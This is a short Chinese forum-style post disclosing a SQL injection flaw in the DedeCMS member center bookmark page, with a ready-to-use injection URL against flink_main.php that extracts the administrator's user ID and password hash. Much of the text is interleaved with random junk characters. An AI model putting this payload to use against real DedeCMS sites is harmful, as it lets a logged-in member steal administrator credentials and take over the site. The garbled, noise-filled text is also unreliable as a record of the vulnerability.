DedeCMS会员中心SQL注射漏洞
( J' h" R6 X% X5 J4 p9 T需要magic_quotes_gpc = Off: ? W' e! L4 Y! N# h: X
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
2 n- J; h' g" I% p
# x- W. W7 v* M0 _: e" B, hDedeCMS会员中心书签管理SQL注射漏洞/ J7 `& y5 Y/ n: U1 o; r+ W' n6 g# t
成功利用该漏洞可获得管理员密码* X" e7 }) B! ]1 M
5 _- S! e1 ]& A! j
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码' u3 ^$ Y% \5 Z1 D, _! e
) S! X) |' z* T( B( f
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r0 l: j% O$ d+ ~
|